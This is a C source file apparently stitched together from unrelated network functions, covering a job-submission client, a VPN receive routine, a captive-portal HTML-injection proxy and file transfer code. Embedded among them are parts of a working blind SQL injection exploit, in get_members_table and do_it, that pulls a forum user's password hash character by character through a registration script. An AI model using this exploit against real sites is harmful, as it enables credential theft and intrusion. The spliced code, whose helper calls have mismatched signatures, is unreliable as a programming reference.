int receive_host_list(int connection, host_list **list) {
int err, num, i;
host_port *hosts, *temp;
host_list_node *runner;
unsigned int id;
num = 0;
//size of array
err = safe_recv(connection, &num, sizeof(int));
if(err < OKAY) return err;
hosts = malloc(sizeof(host_port)*num);
err = safe_recv(connection, hosts, sizeof(host_port)*num);
if(err < OKAY) return err;
err = safe_recv(connection, &id, sizeof(unsigned int));
if(err < OKAY) return err;
//we malloc new host ports so that freeing is easy later
//we cant just use the memory we allocated earlier as an array
//or else it is impossible to free individual elements of the list
temp = malloc(sizeof(host_port));
memcpy(temp, &hosts[0], sizeof(host_port));
*list = new_host_list(temp);
runner = (*list)->head;
(*list)->id = id;
for(i = 1; i < num; i++) {
temp = malloc(sizeof(host_port));
memcpy(temp, &hosts[i], sizeof(host_port));
runner = add_to_host_list(temp, runner);
}
return OKAY;
}
int receive_file(int connection, data_size *file) {
int err;
err = safe_recv(connection, &(file->size), sizeof(size_t));
if(err < 0) problem("Recv failed size\n");
file->data = malloc(file->size);
err = safe_recv(connection, file->data, file->size);
if(err < 0) problem("Recv failed data\n");
err = safe_recv(connection, file->name, MAX_ARGUMENT_LEN*sizeof(char));
if(err < 0) problem("Recv failed name\n");
}
int request_add_lock(int connection) {
int num = REQUEST_ADD_LOCK;
do_rpc(&num);
num = FAILURE;
safe_recv(connection, &num, sizeof(int));
return num;
}
int submit_job_to_server(char *host, int port, job *to_send, data_size *files, int num_files) {
int connection, i, err;
char ip[INET_ADDRSTRLEN];
i = make_connection_with(host, port, &connection);
if(i < 0) {
problem("Connection to server failed\n");
exit(-1);
}
i = ADD_JOB;
do_rpc(&i);
err = safe_send(connection, to_send, sizeof(job));
if(err < 0) problem("Send job failed, %d\n", err);
safe_send(connection, &num_files, sizeof(int));
for(i = 0; i < num_files; i++) {
err = safe_send(connection, &(files[i].size), sizeof(size_t));
if(err < 0) problem("Send failed size\n");
err = safe_send(connection, files[i].data, files[i].size);
if(err < 0) problem("Send failed data\n");
err = safe_send(connection, files[i].name, MAX_ARGUMENT_LEN*sizeof(char));
if(err < 0) problem("Send failed name\n");
}
safe_recv(connection, &i, sizeof(int));
close(connection);
return i;
}
int tell_to_unlock(int connection) {
int num = UNLOCK;
do_rpc(&num);
num = FAILURE;
safe_recv(connection, &num, sizeof(int));
return num;
}
int get_err_page_size(struct sockaddr_in sa)
{
char buf[20000], *p;
int s, sz;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
exit(1);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
perror("connect");
exit(1);
}
sprintf(buf,
"GET %s/%s?action=reg®submit=1&username=%s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"User-Agent: %s\r\n"
"Connection: close\r\n"
"\r\n",
path, SCRIPT, user, target_host, USERAGENT);
safe_send(s, buf, strlen(buf), 0);
safe_recv(s, buf, sizeof(buf), 0);
if (!(p = strstr(buf, "\r\n\r\n"))) {
printf("cant get error page\n");
exit(1);
}
sz = strlen(p)-4;
close(s);
return sz;
}
static int netlink_route_results(int fd, char *b, size_t blen) {
int len = 0;
int left = blen;
bzero(b, blen);
while (left > 0) {
int rtn = safe_recv(fd, b, left, 0);
struct nlmsghdr *hdr = (struct nlmsghdr *) b;
if (rtn <= 0) {
perror("recv");
break;
}
if (hdr->nlmsg_type == NLMSG_DONE) {
break;
}
b += rtn;
left -= rtn;
len += rtn;
}
return len;
}
char *get_members_table(struct sockaddr_in sa)
{
static char members_table[64];
char buf[1024], *p, *q;
int s;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
exit(1);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
perror("connect");
exit(1);
}
sprintf(buf,
"GET %s/%s?action=reg®submit=1&email1=+FROM HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"User-Agent: %s\r\n"
"Connection: close\r\n"
"\r\n",
path, SCRIPT, target_host, USERAGENT);
safe_send(s, buf, strlen(buf), 0);
safe_recv(s, buf, sizeof(buf), 0);
if (!((p = strstr(buf, "FROM "))) || !((q = strstr((p+5), " WHERE")))) {
printf("cant get members table. maybe wrong path?\n");
exit(1);
}
*q = '\0';
strcpy(members_table, p+5);
close(s);
return members_table;
}
static void do_one_client(int s, struct drcom_handle *h)
{
struct drcomcd_hdr cd_hdr;
int s2;
fd_set rfds;
struct timeval t;
int r;
s2 = accept(s, NULL, NULL);
if (s2 == -1 && errno != EINTR) {
logerr("daemon: accept failed: %s", strerror(errno));
return;
}
FD_ZERO(&rfds);
FD_SET(s2, &rfds);
t.tv_sec = 2;
t.tv_usec = 0;
r = select(s2+1, &rfds, NULL, NULL, &t);
if(r<=0){
logerr("accepted, but no data\n");
goto error;
}
if(!FD_ISSET(s2, &rfds)){
goto error;
}
r = safe_recv(s2, &cd_hdr, sizeof(struct drcomcd_hdr));
if (r != sizeof(struct drcomcd_hdr)){
logerr("daemon: recv: %s", strerror(errno));
goto error;
}
if (cd_hdr.signature != DRCOM_SIGNATURE) {
logerr("Unknown signature\n");
goto error;
}
switch (cd_hdr.type) {
case DRCOMCD_LOGIN:
do_command_login(s2, h);
break;
case DRCOMCD_LOGOUT:
do_command_logout(s2, h);
break;
case DRCOMCD_PASSWD:
do_command_passwd(s2, h);
break;
default:
break;
}
error:
close(s2);
return;
}
void listen_for_connection(host_port *info) {
pthread_t thread;
int connection, connect_result, listener;
connect_result = set_up_listener(info->port, &listener);
connect_result = -1;
while(1) {
do {
connect_result = wait_for_connection(listener, &connection);
} while(connect_result < 0);
connect_result = 0;
safe_recv(connection, &connect_result, sizeof(int));
if(connect_result) {
pthread_create(&thread, NULL, (void *(*)(void *))receive_int, (void *)&connection);
}
}
}
int get_file(int sockfd, int fd, void (*f)(off_t, off_t))
{
struct stat s;
char buf[BUFSIZ];
off_t i;
off_t j;
if (safe_recv(sockfd, &s, sizeof(struct stat)) <= 0)
return (-1);
i = 0;
while (i < s.st_size)
{
if ((j = recv(sockfd, &buf, BUFSIZ, 0)) <= 0)
return (-1);
write(fd, buf, j);
if (f)
f(i, s.st_size);
i += j;
}
if (f)
f(i, s.st_size);
return (0);
}
static int redir_conn_read(struct conn_t *conn, void *ctx) {
redir_request *req = (redir_request *)ctx;
uint8_t bb[PKT_MAX_LEN];
int s, r;
if ((s=redir_cli_rewrite(req, conn)) != 0)
return 0;
r = safe_recv(conn->sock, bb, sizeof(bb)-1, 0);
#if(_debug_)
log_dbg("conn_read: %d clen=%d", r, req->clen);
#endif
if (r == 0) {
if (req->read_closed && redir_cli_rewrite(req, conn) == 0) {
log_dbg("done reading and writing");
redir_conn_finish(conn, req);
return -1;
}
req->read_closed = 1;
} else if (r < 0 &&
errno != EWOULDBLOCK && errno != EAGAIN) {
log_dbg("ERRNO %d", errno);
redir_conn_finish(conn, ctx);
} else if (r > 0) {
#ifdef ENABLE_REDIRINJECT
bstring inject = inject_fmt(req, 0);
#endif
bb[r]=0;
req->last_active = mainclock_tick();
#ifdef ENABLE_REDIRINJECT
/**
*
*/
if (inject && !req->headers) {
char *newline = "\r\n\r\n";
char *eoh;
bcatblk(req->hbuf, bb, r);
if ((eoh = strstr((char *)req->hbuf->data, newline))) {
int header_len = eoh - (char *)req->hbuf->data;
bstring newhdr = bfromcstr("");
if (strncmp((char *)req->hbuf->data, "HTTP/1.", 7) ||
strncmp((char *)req->hbuf->data+8, " 2", 2)) {
log_dbg("Not HTTP/1.X 2XX reply");
bcatblk(newhdr, req->hbuf->data, header_len + 4);
} else {
char *hdr, *p;
int clen = 0;
hdr = (char *)req->hbuf->data;
while (hdr && *hdr) {
int l;
p = strstr(hdr, "\r\n");
if (p == hdr) {
break;
} else if (p) {
l = (p - hdr);
} else {
l = (eoh - hdr);
}
if (!strncasecmp(hdr, "content-length:", 15)) {
char c = hdr[l];
hdr[l] = 0;
clen = req->clen = atoi(hdr+15);
log_dbg("Detected Content Length %d", req->clen);
hdr[l] = c;
} else if (!strncasecmp(hdr, "content-type:", 13)) {
if (strstr(hdr, "text/html")) {
req->html = 1;
}
} else if (strcasestr(hdr, "content-encoding: gzip")) {
req->gzip = 1;
} else if (strcasestr(hdr, "transfer-encoding:") &&
strstr(hdr,"chunked")) {
req->chunked = 1;
}
hdr += l + 2;
if (!p) break;
}
hdr = (char *)req->hbuf->data;
while (hdr && *hdr) {
int l;
int skip = 0;
p = strstr(hdr, "\r\n");
if (p == hdr) {
break;
} else if (p) {
l = (p - hdr);
} else {
l = (eoh - hdr);
}
if (req->html) {
if (clen && !strncasecmp(hdr, "content-length:", 15)) {
char tmp[128];
if (inject) clen += inject->slen;
safe_snprintf(tmp, sizeof(tmp), "Content-Length: %d\r\n", clen);
bcatcstr(newhdr, tmp);
skip = 1;
} else if (!strncasecmp(hdr, "connection:", 11)) {
skip = 1;
} else if (!strncasecmp(hdr, "accept-ranges:", 14)) {
skip = 1;
}
}
log_dbg("Resp Header [%d] %.*s%s",
l, l, hdr, skip ? " [Skipped]" : "");
if (!skip) {
bcatblk(newhdr, hdr, l + 2);
}
hdr += l + 2;
if (!p) break;
}
bcatcstr(newhdr, "Connection: close\r\n");
/* process headers */
/* Is HTML */
/* Check content-encoding chunked */
/* Adjust content-length */
bcatblk(newhdr, newline, 2);
if (req->html) {
if (req->chunked) {
char tmp[56];
safe_snprintf(tmp, sizeof(tmp), "%x\r\n",
inject->slen);
bcatcstr(newhdr, tmp);
}
bconcat(newhdr, inject);
if (req->chunked) {
bcatblk(newhdr, newline, 2);
}
}
}
bcatblk(newhdr, eoh + 4, req->hbuf->slen - header_len - 4);
if (req->clen > 0) /* adjust clen */
req->clen -= (req->hbuf->slen - header_len - 4);
redir_cli_write(req, newhdr->data, newhdr->slen);
req->headers = 1;
bdestroy(newhdr);
}
} else {
#endif
redir_cli_write(req, bb, r);
if (req->clen > 0)
req->clen -= r;
#ifdef ENABLE_REDIRINJECT
}
#endif
}
/*log_dbg("leaving redir_conn_read()");*/
return 0;
}
int vpn_recv(int fd, vpn_crypt_t *cry, vpn_proto_t type,
void *buf, size_t buflen)
{
vpn_hdr_t hdr;
gcry_cipher_hd_t hd = NULL;
char bigpack[VPN_BIGPACKET], decpack[VPN_BIGPACKET], xiv[256], *s;
int rr, rd, rc, rx;
switch(type) {
case VPN_CLIENT:
hd = cry->hsrc;
break;
case VPN_SERVER:
hd = cry->hdst;
}
memset(bigpack, 0, sizeof(bigpack));
memset(decpack, 0, sizeof(decpack));
/* read packet header */
memset(&hdr, 0, sizeof(hdr));
rr = recv(fd, &hdr, sizeof(hdr), 0);
if(rr == -1)
return rr;
else
if(!rr)
return xmsg(0, VPN_DEBUG|VPN_INFO,
"vpn_recv: lost connection, peer disconnected\n");
else
if(rr != sizeof(hdr))
return xmsg(-1, VPN_DEBUG|VPN_INFO,
"vpn_recv: partial recv of header not allowed\n");
xmsg(0, VPN_DEBUG,
"received %d bytes header, checksum=%d and pad=%d\n",
rr, hdr.checksum, hdr.pad);
if(hdr.checksum > sizeof(bigpack))
return xmsg(-1, VPN_DEBUG|VPN_INFO,
"packet too big: header checksum is %d\n", hdr.checksum);
/* read packet data */
s = bigpack;
rc = hdr.checksum;
rx = 0;
do {
rr = safe_recv(fd, s, rc);
if(rr == -1)
return rr;
else
if(!rr)
return xmsg(0, VPN_DEBUG|VPN_INFO,
"vpn_recv: lost connection, peer disconnected\n");
xmsg(0, VPN_DEBUG, "read %d bytes of packet...\n", rr);
s += rr;
rx += rr;
rc -= rr;
} while(rx < hdr.checksum);
/* generate iv to decrypt */
if(!cry->rndrecv) cry->rndrecv = initial_iv_random;
memset(xiv, 0, sizeof(xiv));
gen_iv(xiv, cry->blklen, cry->rndrecv);
/* xmsg(0, VPN_DEBUG, "recv using iv: %s\n", xiv); */
/* decrypt */
rd = xdecrypt(hd, cry->blklen, xiv,
decpack, sizeof(decpack), bigpack, hdr.checksum);
if(rd == -1 || rd != hdr.checksum)
return xmsg(-1, VPN_DEBUG|VPN_INFO,
"vpn_recv: cannot decrypt packet (%d != %d)\n",
rd, hdr.checksum);
/* copy data to user */
memcpy(buf, decpack, hdr.checksum - hdr.pad);
/* set next iv */
cry->rndrecv = hdr.checksum - hdr.pad;
return hdr.checksum - hdr.pad;
}
void do_it()
{
char *table;
struct sockaddr_in sa;
int s, c, spread, pos, i, err_sz, sz;
char buf[31337], email2[20000], hash[33], *p;
resolve_host((struct sockaddr *)&sa, target_host);
sa.sin_port = htons(target_port);
printf("\nAttacking %s:%d (%s)\n\n", target_host, target_port,
inet_ntoa(sa.sin_addr));
printf("Using script path: %s/%s\n", path, SCRIPT);
err_sz = get_err_page_size(sa);
printf("Got error page size: %d bytes\n", err_sz);
table = get_members_table(sa);
printf("Got members table: %s\n", table);
printf("This may take a while...\n\n");
printf("* %s's password hash: ", user);
fflush(stdout);
for (c=beginchar; c<=endchar; c++) {
for (spread=8,pos=0; spread; spread/=2) {
sprintf(email2, "+and(");
for (i=0; i<spread; i++) {
sprintf(email2, "%s+mid(%s.password,%d,1)=char(%d)", email2, table, c,
hexchars[pos+i]);
if (i<spread-1)
strcat(email2, "+or");
else
strcat(email2, ")");
}
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket");
exit(1);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
perror("connect");
exit(1);
}
sprintf(buf,
"GET %s/%s?action=reg®submit=1&email2=%s&username=%s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"User-Agent: %s\r\n"
"Connection: close\r\n\r\n",
path, SCRIPT, email2, user, target_host, USERAGENT);
safe_send(s, buf, strlen(buf), 0);
memset(buf,0,sizeof(buf));
safe_recv(s, buf, sizeof(buf), 0);
if (!(p = strstr(buf, "\r\n\r\n"))) {
printf("something failed\n");
exit(1);
}
sz = strlen(p)-4;
if (sz == err_sz) {
if (spread == 1) {
hash[c] = hexchars[pos];
}
}
else {
if (spread == 1) {
hash[c] = hexchars[pos+spread];
}
pos += spread;
}
close(s);
}
printf("%c", hash[c]);
fflush(stdout);
}
printf("\n\nDone.\n");
}
void receive_int(int *connection) {
int incoming = 0;
safe_recv(*connection, &incoming, sizeof(int));
printf("Received %d\n", incoming);
}
